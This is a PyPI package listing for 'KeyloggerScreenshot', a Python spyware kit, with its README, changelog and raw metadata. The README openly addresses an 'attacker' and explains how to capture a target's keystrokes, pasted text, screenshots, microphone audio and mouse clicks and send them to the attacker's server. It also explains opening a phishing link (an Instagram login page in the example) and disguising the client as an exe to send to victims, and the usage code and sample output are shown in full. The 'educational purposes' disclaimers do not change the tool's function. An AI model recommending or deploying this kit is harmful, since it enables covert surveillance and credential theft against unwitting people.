KeyloggerScreenshot


NameKeyloggerScreenshot JSON
Version 0.6.2.1 PyPI version JSON
download
home_page
SummaryExporting Keylogger files, recording audio, recording mouse click information and screenshots of the target. For more information check out my website:https://pypi.org/project/KeyloggerScreenshot/ and my github: https://github.com/Facileee/KeyloggerScreenshot
upload_time2023-09-07 07:39:22
maintainer
docs_urlNone
authorFawaz Bashiru
requires_python
licenseMIT
keywords keylogger
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            KeyloggerScreenshot
===================

Created by: Fawaz Bashiru

KeyloggerScreenshot allows the attacker to get all the information the target was typing and taking screenshot of specific minutes which is being calculated in the script and all the audio of the target was speaking will be stored where your server is located. You can open a link when the keylogger is executed. Follow the instructions to build your own server in "KeyloggerScreenshot"

check out my github (easier way): https://github.com/Kill0geR/KeyloggerScreenshot

GITHUB-VERSION (SNEAK PEAK):
----------------------------
![kali_img](https://user-images.githubusercontent.com/106278241/206914635-c9d5e505-9499-4dce-91ed-5254f495929d.png)


SHOUT OUT TO:
-------------
NAME: dyma020

Link to his insta: https://www.instagram.com/dyma020/

He had the idea of the mouse information. He also build the graphical user interface. Big thanks to him

HOW DOES KeyloggerScreenshot WORK?
-----------------------------------
To install KeyloggerScreenshot simply write:

`pip install KeyloggerScreenshot`

in your terminal

After that create a server:

Server
------ 
```python
#EveryServer.py:
import KeyloggerScreenshot as ks
import threading

ip = "127.0.0.1"

ip_photos, port_photos = ip, 1111
server_photos = ks.ServerPhotos(ip_photos, port_photos)

ip_keylogger, port_keylogger = ip, 2222
server_keylogger = ks.ServerKeylogger(ip_keylogger, port_keylogger)

ip_listener, port_listener = ip, 3333
server_listener = ks.ServerListener(ip_listener, port_listener)

ip_time, port_time = ip, 4444
server_time = ks.Timer(ip_time, port_time)

threading_server = threading.Thread(target=server_photos.start)
threading_server.start()

threading_server2 = threading.Thread(target=server_keylogger.start)
threading_server2.start()

threading_server3 = threading.Thread(target=server_listener.start)
threading_server3.start()

threading_server4 = threading.Thread(target=server_time.start_timer)
threading_server4.start()
```

Client
------

```python
#client_target.py
import KeyloggerScreenshot as ks

ip = '127.0.0.1'
key_client = ks.KeyloggerTarget(ip, 1111, ip, 2222, ip, 3333,ip, 4444, duration_in_seconds=60, phishing_web="https://www.instagram.com/accounts/login/?__coig_restricted=1") # You can open a link when the keylogger starts
key_client.start()
```
You can specify the time of running in seconds in the "duration_in_seconds" variable


Essential Informations:
------------------------
* This module can be used in Windows and Linux

* The servers can now be run in the same file with the module threading

* The port number for each server should be different

* The server should obviously be run before the client

* You can just copy the following code and insert you ip-address in the variable "ip"

* You can find your ip-address in the command line by using the command "ipconfig"

* If you want a cool simulation you can specify that in ServerKeylogger by setting the Parameter simulater to True

* You can open a link that you can choose when the keylogger is executed. Set the Parameter "phishing_web" to your link

* If you really want to send this to work externally, you have to buy a server and download the code on my github.

* If backspace is pressed the last pressed character will be deleted from the list

Output
-------
```    __ __              __                                 _____                                       __            __ 
   / //_/___   __  __ / /____   ____ _ ____ _ ___   _____/ ___/ _____ _____ ___   ___   ____   _____ / /_   ____   / /_
  / ,<  / _ \ / / / // // __ \ / __ `// __ `// _ \ / ___/\__ \ / ___// ___// _ \ / _ \ / __ \ / ___// __ \ / __ \ / __/
 / /| |/  __// /_/ // // /_/ // /_/ // /_/ //  __// /   ___/ // /__ / /   /  __//  __// / / /(__  )/ / / // /_/ // /_  
/_/ |_|\___/ \__, //_/ \____/ \__, / \__, / \___//_/   /____/ \___//_/    \___/ \___//_/ /_//____//_/ /_/ \____/ \__/  
            /____/           /____/ /____/    

                        ~Created by: Fawaz Bashiru~          
                        ~Write "python KLS_start.py -help" for help in the github version~   
                        REMINDER THIS WAS BUILD FOR EDUCATIONAL PURPOSES  
                        SO DON'T USE THIS FOR EVIL ACTIVITIES !!!!!                        
        
Cyan: ServerPhotos
Blue: ServerKeylogger
Green: ServerListener
White: Timer

Waiting for connection...
Waiting for connection...
Waiting for connection....
Connection has been established with ('127.0.0.1', 49162)
The target is being connected. The Data of the target is coming....
Time left: 00:01
Successful connection for 1 minutes


Connection has been established with ('127.0.0.1', 49199)

Connection has been established with ('127.0.0.1', 49198)
The coordinates of the target have been saved to your directory
True
Text of target: Hello and welcome to KeyloggerScreenshot. I hope you like it and please remember do not use this for evil activities [TAB] 
"Audio of Target.wav" has been saved to your directory
Simulation will come in 10 seconds!!!
3 Images has been saved to your working directory
Waiting for connection...
Do you want to start y/n?: y

The target has clicked 1 times on his screen
This simulation will last for 0 minutes and 27 seconds

Time left: 00:01
THANK YOU FOR YOU USING KEYLOGGERSCREENSHOT
ERFOLGREICH: Der Prozess mit PID 7768 wurde beendet.
```


Directory of Attacker
---------------------
![endresult](https://user-images.githubusercontent.com/106278241/210905855-35bc8cc1-435e-4dc6-bae7-62fcdedd1484.png)

Additional
==========
* You can send "target.py" as an exe file to the target with "auto-py-to-exe"

* KeyloggerScreenshot is very easy to use.

* The servers can be used on any OS. The client should be a Windows OS

* DO NOT USE THIS TO ATTACK SOMEONE FOREIGN. I BUILD IT FOR EDUCATIONAL PURPOSES.

* Simulation_code.py wont work properly on Virtual Machine

* Server will shutdown automatically after everything has been sent to the server.



Change Log
==========

0.0.1 (14/10/2022)
-----------------
- First Release

0.0.2 (15/10/2022)
-----------------
- Bug Fixes

0.0.3 (15/10/2022)
-----------------
- Bug Fixes

0.0.4 (17/10/2022)
-----------------
- New features (Audio Recorder from target, All Servers in one file)
- Bug Fixes
- Detailed review of the code

0.0.5 (18/10/2022)
-----------------
- Better audio connection
- Bug Fixes

0.0.6 (19/10/2022)
-----------------
- New Timer Class
- Better Output on Terminal
- More efficient connection
- More Ports and IP's

0.0.6.1 (19/10/2022)
------------------
- Bug Fixes-

0.0.7 (24/10/2022)
-----------------
- Better Description

0.1.0 (30/10/2022)
-----------------
- Bug Fixes
- - pyscreeze Error fixed
- Keyboard Interruption (server will be destroyed after Keyboard Interruption from the user)
- Keylogger data even after Keyboard Interruption
- Much better Audio connection
- Better Audio Files

0.1.1 (30/10/2022)
------------------
- Image fix on website

0.1.2 (7/11/2022)
------------------
- Bug Fixes
- Big Update 12.11.2022

0.2.2 (04/02/2023)
-------------------
- Audio of target got fixed
- Mouse log in fixed
- - All Mouse Logs will be saved in "mouseLogInfo.txt"
- new function called "check_double" which detects if there are more files

0.2.3 (10/02/2023)
- - - - ------------------
- Multiple Mouse Log Text Files at ones
- New Graphical User Interface (GUI)
- New simulation feature (only on linux)
- Capslock detection
- Better documentation

0.2.3.2 (11/02/2023)
------------------
- Multiple Image Files at ones

0.2.4 (12/02/2023)
------------------
- special caps characters
- simulation now on windows
- New speed calculation

0.2.4.1 (16/02/2023)
------------------
- simulation fix

0.2.4.2 (03/03/2023)
------------------
- stops the process of the python script
- OS Error fixed in Server
- exe file planned for GitHub

0.2.5 (04/03/2023)
------------------
- Detects if no microphone is plugged in
- Detects if the microphone setting has been disabled
- Cleaner Code
- New Funktion on "ServerPhotos" called "get_data". This funktion gets the data which has been sent via sockets
- KeyloggerScreenshot now runs on servers without a display on github: https://github.com/Kill0geR/KeyloggerScreenshot

0.2.6 (13/03/2023)
------------------
- You can now open a link on the victims machine
- Set the variable "phishing_web" with your link
- Cleaner code
- No Global variables more

0.2.7 (14/03/2023)
------------------
- New code on github
- Cleaner code
- More efficient code

0.2.7.1 (17/03/2023)
------------------
- Phishing link server fix

0.2.7.2 (18/03/2023)
------------------
- simulation timer fixed
- better terminal on simulation
- numbers can now be sent (fixed)

0.2.8 (31/03/2023)
------------------
- Port number fixed
- Already used ports will now be shown

0.2.9 (03/04/2023)
------------------
- Better Port documentation
- New File "Simulation_code.py" (This stores the code for the simulation. Only on GitHub!!!)
- Cleaner ServerKeylogger code
- New help instruction on KLS_start on GitHub

0.2.9.1 (15/04/2023)
------------------
- Data which the target has pasted will now be shown on the server
- Documentation incoming

0.3.0 (20/04/2023)
------------------
- Simulation now stops after stop button is pressed
- Bug fixes
- New Code on "Simulation_code.py" and on "KLS_Start.py"
- New files on github https://github.com/Kill0geR/KeyloggerScreenshot

0.3.1 (26/04/2023)
------------------
- Bug fixes
- Cleaner Code

0.4.0 (30/04/2023)
------------------
- Cleaner Code in Simulation_code.py script
- Directories of the target will be deleted after Keyboard interruption
- New File on KeyloggerScreenshot Local_Deleter.py + Documentation
- After Backspace a new list will be shown
- More intelligent Keylogger (understands when to change the list)
- Stops the process of images also in linux with PID
- PID fix on windows
- duration_in_seconds has been changed to 60 seconds from 200 seconds
- Mouseclick information will now be sent after Interruption
- More intelligent Keylogger
- If backspace is pressed the last pressed character will be deleted from the list
- Detects if backspace is hold for a long time

0.4.1 (08/05/2023)
------------------
- Fixed Interruption Error
- Every coordinate of the target no mater what Image size it has will now be shown on the hackers Simulation_code

0.4.2 (23/05/2023)
------------------
- Fixed simulation Error
- Every coordinate will be shown by order

0.4.3 (22/06/2023)
------------------
- Simulation_code.py will now be made if simulator on Server_keylogger is true

0.5.0 (07/07/2023)
------------------
- All Images will now be sent at once
- No more random Images
- More efficient connections
- New Output
- New Name of the images ("Image_Target")
- Data will be stored locally when the server is offline. If the server is online the data will automatically be sent

0.6.0 (10/07/2023)
------------------
- Everything improved from the previous update
- Detects if the server is offline
- Py to exe now works without any issues

0.6.1 (10/07/2023)
------------------
- fixed error

0.6.2 (22/08/2023)
------------------
- Terminates server after execution
- Closes every open socket

0.6.2.1 (07/09/2023)
------------------
- fixed README

            

Raw data

            {
    "_id": null,
    "home_page": "",
    "name": "KeyloggerScreenshot",
    "maintainer": "",
    "docs_url": null,
    "requires_python": "",
    "maintainer_email": "",
    "keywords": "Keylogger",
    "author": "Fawaz Bashiru",
    "author_email": "fawazbashiru@gmail.com",
    "download_url": "https://files.pythonhosted.org/packages/82/17/512d89a2dca500b67333de45bb7588bdd071603539cbddcb35edb1286600/KeyloggerScreenshot-0.6.2.1.tar.gz",
    "platform": null,
    "description": "KeyloggerScreenshot\n===================\n\nCreated by: Fawaz Bashiru\n\nKeyloggerScreenshot allows the attacker to get all the information the target was typing and taking screenshot of specific minutes which is being calculated in the script and all the audio of the target was speaking will be stored where your server is located. You can open a link when the keylogger is executed. Follow the instructions to build your own server in \"KeyloggerScreenshot\"\n\ncheck out my github (easier way): https://github.com/Kill0geR/KeyloggerScreenshot\n\nGITHUB-VERSION (SNEAK PEAK):\n----------------------------\n![kali_img](https://user-images.githubusercontent.com/106278241/206914635-c9d5e505-9499-4dce-91ed-5254f495929d.png)\n\n\nSHOUT OUT TO:\n-------------\nNAME: dyma020\n\nLink to his insta: https://www.instagram.com/dyma020/\n\nHe had the idea of the mouse information. He also build the graphical user interface. Big thanks to him\n\nHOW DOES KeyloggerScreenshot WORK?\n-----------------------------------\nTo install KeyloggerScreenshot simply write:\n\n`pip install KeyloggerScreenshot`\n\nin your terminal\n\nAfter that create a server:\n\nServer\n------ \n```python\n#EveryServer.py:\nimport KeyloggerScreenshot as ks\nimport threading\n\nip = \"127.0.0.1\"\n\nip_photos, port_photos = ip, 1111\nserver_photos = ks.ServerPhotos(ip_photos, port_photos)\n\nip_keylogger, port_keylogger = ip, 2222\nserver_keylogger = ks.ServerKeylogger(ip_keylogger, port_keylogger)\n\nip_listener, port_listener = ip, 3333\nserver_listener = ks.ServerListener(ip_listener, port_listener)\n\nip_time, port_time = ip, 4444\nserver_time = ks.Timer(ip_time, port_time)\n\nthreading_server = threading.Thread(target=server_photos.start)\nthreading_server.start()\n\nthreading_server2 = threading.Thread(target=server_keylogger.start)\nthreading_server2.start()\n\nthreading_server3 = threading.Thread(target=server_listener.start)\nthreading_server3.start()\n\nthreading_server4 = threading.Thread(target=server_time.start_timer)\nthreading_server4.start()\n```\n\nClient\n------\n\n```python\n#client_target.py\nimport KeyloggerScreenshot as ks\n\nip = '127.0.0.1'\nkey_client = ks.KeyloggerTarget(ip, 1111, ip, 2222, ip, 3333,ip, 4444, duration_in_seconds=60, phishing_web=\"https://www.instagram.com/accounts/login/?__coig_restricted=1\") # You can open a link when the keylogger starts\nkey_client.start()\n```\nYou can specify the time of running in seconds in the \"duration_in_seconds\" variable\n\n\nEssential Informations:\n------------------------\n* This module can be used in Windows and Linux\n\n* The servers can now be run in the same file with the module threading\n\n* The port number for each server should be different\n\n* The server should obviously be run before the client\n\n* You can just copy the following code and insert you ip-address in the variable \"ip\"\n\n* You can find your ip-address in the command line by using the command \"ipconfig\"\n\n* If you want a cool simulation you can specify that in ServerKeylogger by setting the Parameter simulater to True\n\n* You can open a link that you can choose when the keylogger is executed. Set the Parameter \"phishing_web\" to your link\n\n* If you really want to send this to work externally, you have to buy a server and download the code on my github.\n\n* If backspace is pressed the last pressed character will be deleted from the list\n\nOutput\n-------\n```    __ __              __                                 _____                                       __            __ \n   / //_/___   __  __ / /____   ____ _ ____ _ ___   _____/ ___/ _____ _____ ___   ___   ____   _____ / /_   ____   / /_\n  / ,<  / _ \\ / / / // // __ \\ / __ `// __ `// _ \\ / ___/\\__ \\ / ___// ___// _ \\ / _ \\ / __ \\ / ___// __ \\ / __ \\ / __/\n / /| |/  __// /_/ // // /_/ // /_/ // /_/ //  __// /   ___/ // /__ / /   /  __//  __// / / /(__  )/ / / // /_/ // /_  \n/_/ |_|\\___/ \\__, //_/ \\____/ \\__, / \\__, / \\___//_/   /____/ \\___//_/    \\___/ \\___//_/ /_//____//_/ /_/ \\____/ \\__/  \n            /____/           /____/ /____/    \n\n                        ~Created by: Fawaz Bashiru~          \n                        ~Write \"python KLS_start.py -help\" for help in the github version~   \n                        REMINDER THIS WAS BUILD FOR EDUCATIONAL PURPOSES  \n                        SO DON'T USE THIS FOR EVIL ACTIVITIES !!!!!                        \n        \nCyan: ServerPhotos\nBlue: ServerKeylogger\nGreen: ServerListener\nWhite: Timer\n\nWaiting for connection...\nWaiting for connection...\nWaiting for connection....\nConnection has been established with ('127.0.0.1', 49162)\nThe target is being connected. The Data of the target is coming....\nTime left: 00:01\nSuccessful connection for 1 minutes\n\n\nConnection has been established with ('127.0.0.1', 49199)\n\nConnection has been established with ('127.0.0.1', 49198)\nThe coordinates of the target have been saved to your directory\nTrue\nText of target: Hello and welcome to KeyloggerScreenshot. I hope you like it and please remember do not use this for evil activities [TAB] \n\"Audio of Target.wav\" has been saved to your directory\nSimulation will come in 10 seconds!!!\n3 Images has been saved to your working directory\nWaiting for connection...\nDo you want to start y/n?: y\n\nThe target has clicked 1 times on his screen\nThis simulation will last for 0 minutes and 27 seconds\n\nTime left: 00:01\nTHANK YOU FOR YOU USING KEYLOGGERSCREENSHOT\nERFOLGREICH: Der Prozess mit PID 7768 wurde beendet.\n```\n\n\nDirectory of Attacker\n---------------------\n![endresult](https://user-images.githubusercontent.com/106278241/210905855-35bc8cc1-435e-4dc6-bae7-62fcdedd1484.png)\n\nAdditional\n==========\n* You can send \"target.py\" as an exe file to the target with \"auto-py-to-exe\"\n\n* KeyloggerScreenshot is very easy to use.\n\n* The servers can be used on any OS. The client should be a Windows OS\n\n* DO NOT USE THIS TO ATTACK SOMEONE FOREIGN. I BUILD IT FOR EDUCATIONAL PURPOSES.\n\n* Simulation_code.py wont work properly on Virtual Machine\n\n* Server will shutdown automatically after everything has been sent to the server.\n\n\n\nChange Log\n==========\n\n0.0.1 (14/10/2022)\n-----------------\n- First Release\n\n0.0.2 (15/10/2022)\n-----------------\n- Bug Fixes\n\n0.0.3 (15/10/2022)\n-----------------\n- Bug Fixes\n\n0.0.4 (17/10/2022)\n-----------------\n- New features (Audio Recorder from target, All Servers in one file)\n- Bug Fixes\n- Detailed review of the code\n\n0.0.5 (18/10/2022)\n-----------------\n- Better audio connection\n- Bug Fixes\n\n0.0.6 (19/10/2022)\n-----------------\n- New Timer Class\n- Better Output on Terminal\n- More efficient connection\n- More Ports and IP's\n\n0.0.6.1 (19/10/2022)\n------------------\n- Bug Fixes-\n\n0.0.7 (24/10/2022)\n-----------------\n- Better Description\n\n0.1.0 (30/10/2022)\n-----------------\n- Bug Fixes\n- - pyscreeze Error fixed\n- Keyboard Interruption (server will be destroyed after Keyboard Interruption from the user)\n- Keylogger data even after Keyboard Interruption\n- Much better Audio connection\n- Better Audio Files\n\n0.1.1 (30/10/2022)\n------------------\n- Image fix on website\n\n0.1.2 (7/11/2022)\n------------------\n- Bug Fixes\n- Big Update 12.11.2022\n\n0.2.2 (04/02/2023)\n-------------------\n- Audio of target got fixed\n- Mouse log in fixed\n- - All Mouse Logs will be saved in \"mouseLogInfo.txt\"\n- new function called \"check_double\" which detects if there are more files\n\n0.2.3 (10/02/2023)\n- - - - ------------------\n- Multiple Mouse Log Text Files at ones\n- New Graphical User Interface (GUI)\n- New simulation feature (only on linux)\n- Capslock detection\n- Better documentation\n\n0.2.3.2 (11/02/2023)\n------------------\n- Multiple Image Files at ones\n\n0.2.4 (12/02/2023)\n------------------\n- special caps characters\n- simulation now on windows\n- New speed calculation\n\n0.2.4.1 (16/02/2023)\n------------------\n- simulation fix\n\n0.2.4.2 (03/03/2023)\n------------------\n- stops the process of the python script\n- OS Error fixed in Server\n- exe file planned for GitHub\n\n0.2.5 (04/03/2023)\n------------------\n- Detects if no microphone is plugged in\n- Detects if the microphone setting has been disabled\n- Cleaner Code\n- New Funktion on \"ServerPhotos\" called \"get_data\". This funktion gets the data which has been sent via sockets\n- KeyloggerScreenshot now runs on servers without a display on github: https://github.com/Kill0geR/KeyloggerScreenshot\n\n0.2.6 (13/03/2023)\n------------------\n- You can now open a link on the victims machine\n- Set the variable \"phishing_web\" with your link\n- Cleaner code\n- No Global variables more\n\n0.2.7 (14/03/2023)\n------------------\n- New code on github\n- Cleaner code\n- More efficient code\n\n0.2.7.1 (17/03/2023)\n------------------\n- Phishing link server fix\n\n0.2.7.2 (18/03/2023)\n------------------\n- simulation timer fixed\n- better terminal on simulation\n- numbers can now be sent (fixed)\n\n0.2.8 (31/03/2023)\n------------------\n- Port number fixed\n- Already used ports will now be shown\n\n0.2.9 (03/04/2023)\n------------------\n- Better Port documentation\n- New File \"Simulation_code.py\" (This stores the code for the simulation. Only on GitHub!!!)\n- Cleaner ServerKeylogger code\n- New help instruction on KLS_start on GitHub\n\n0.2.9.1 (15/04/2023)\n------------------\n- Data which the target has pasted will now be shown on the server\n- Documentation incoming\n\n0.3.0 (20/04/2023)\n------------------\n- Simulation now stops after stop button is pressed\n- Bug fixes\n- New Code on \"Simulation_code.py\" and on \"KLS_Start.py\"\n- New files on github https://github.com/Kill0geR/KeyloggerScreenshot\n\n0.3.1 (26/04/2023)\n------------------\n- Bug fixes\n- Cleaner Code\n\n0.4.0 (30/04/2023)\n------------------\n- Cleaner Code in Simulation_code.py script\n- Directories of the target will be deleted after Keyboard interruption\n- New File on KeyloggerScreenshot Local_Deleter.py + Documentation\n- After Backspace a new list will be shown\n- More intelligent Keylogger (understands when to change the list)\n- Stops the process of images also in linux with PID\n- PID fix on windows\n- duration_in_seconds has been changed to 60 seconds from 200 seconds\n- Mouseclick information will now be sent after Interruption\n- More intelligent Keylogger\n- If backspace is pressed the last pressed character will be deleted from the list\n- Detects if backspace is hold for a long time\n\n0.4.1 (08/05/2023)\n------------------\n- Fixed Interruption Error\n- Every coordinate of the target no mater what Image size it has will now be shown on the hackers Simulation_code\n\n0.4.2 (23/05/2023)\n------------------\n- Fixed simulation Error\n- Every coordinate will be shown by order\n\n0.4.3 (22/06/2023)\n------------------\n- Simulation_code.py will now be made if simulator on Server_keylogger is true\n\n0.5.0 (07/07/2023)\n------------------\n- All Images will now be sent at once\n- No more random Images\n- More efficient connections\n- New Output\n- New Name of the images (\"Image_Target\")\n- Data will be stored locally when the server is offline. If the server is online the data will automatically be sent\n\n0.6.0 (10/07/2023)\n------------------\n- Everything improved from the previous update\n- Detects if the server is offline\n- Py to exe now works without any issues\n\n0.6.1 (10/07/2023)\n------------------\n- fixed error\n\n0.6.2 (22/08/2023)\n------------------\n- Terminates server after execution\n- Closes every open socket\n\n0.6.2.1 (07/09/2023)\n------------------\n- fixed README\n",
    "bugtrack_url": null,
    "license": "MIT",
    "summary": "Exporting Keylogger files, recording audio, recording mouse click information and screenshots of the target. For more information check out my website:https://pypi.org/project/KeyloggerScreenshot/ and my github: https://github.com/Facileee/KeyloggerScreenshot",
    "version": "0.6.2.1",
    "project_urls": null,
    "split_keywords": [
        "keylogger"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "8217512d89a2dca500b67333de45bb7588bdd071603539cbddcb35edb1286600",
                "md5": "61a8a719eec6ede9ffd35487e78e7f90",
                "sha256": "0b4d09ad5070416463ac1bc7c1ae57dde2e2e582d05963ed20ce815d3e4b95b7"
            },
            "downloads": -1,
            "filename": "KeyloggerScreenshot-0.6.2.1.tar.gz",
            "has_sig": false,
            "md5_digest": "61a8a719eec6ede9ffd35487e78e7f90",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": null,
            "size": 21004,
            "upload_time": "2023-09-07T07:39:22",
            "upload_time_iso_8601": "2023-09-07T07:39:22.399532Z",
            "url": "https://files.pythonhosted.org/packages/82/17/512d89a2dca500b67333de45bb7588bdd071603539cbddcb35edb1286600/KeyloggerScreenshot-0.6.2.1.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2023-09-07 07:39:22",
    "github": false,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "lcname": "keyloggerscreenshot"
}
        
Elapsed time: 1.53281s